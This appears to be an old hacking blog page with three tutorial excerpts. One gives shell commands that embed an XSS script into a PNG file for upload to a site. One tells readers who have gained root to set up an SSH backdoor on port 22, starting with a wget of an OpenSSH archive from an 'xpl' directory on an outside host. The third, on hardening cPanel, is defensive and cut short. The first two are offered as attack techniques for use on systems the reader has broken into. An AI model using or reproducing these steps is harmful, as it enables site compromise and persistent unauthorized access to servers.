A little bit of yourself in this section. There are 3 three text graphics associated to this section; Subscribe me, Advertisements and About Me. I hope either one will suit your need.

Updates: Currently I'm testing on wordpress 2.5. I hope to release this theme real soon. So stay tune and dont forget to subscribe my blog. You can add more text here. Overflown text will be hidden, so make sure to end your text just right here. More...
Oct
17th

Embed XSS script into images

Author: admin | Files under tutorials

Open new shell n write this
echo -en “\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0DPHCK\x00\x00\x00\x01\x00\x00\x00\x01″ > images.png
enter your code like this :
echo -n “<hml><body><script>alert(’wicux ngetes’);</script></body></html>” >> images.png
how to test it??
1.upload your images
2.press Ctrl + U to show the page source and find the path of your picture
3.copy the path and add it to the url example : http://taek.com/imagespath/images.png
Source h4cky0u


Oct
17th

Setting up a backdoor on port 22

Author: admin | Files under tutorials

We all know that after gain root, majority of us using shv4,5 or shv7 to make rootkit, how about if we using port 22 for our backdoor? this technick is founded by other person (credit to real author) but i found this methode very usefull.. here we go
after gain root we install openssh-3.6.1p2.tar.
$ wget www.somesite.com/xpl/openssh-3.6.1p2.tar
$ [...]


Oct
14th

SECURING CPANEL - WHM - AND ROOT on a VPS

Author: admin | Files under tutorials

Hope this helps you to secure your hard work from hackers;
SECURING CPANEL - WHM - AND ROOT on a VPS
Checking For FormMail
=========================================
Form mail is used by hackers to send out spam email, by relay and injection methods. If you are using matts script or a version of it, you may be in jeopardy.
Command to find [...]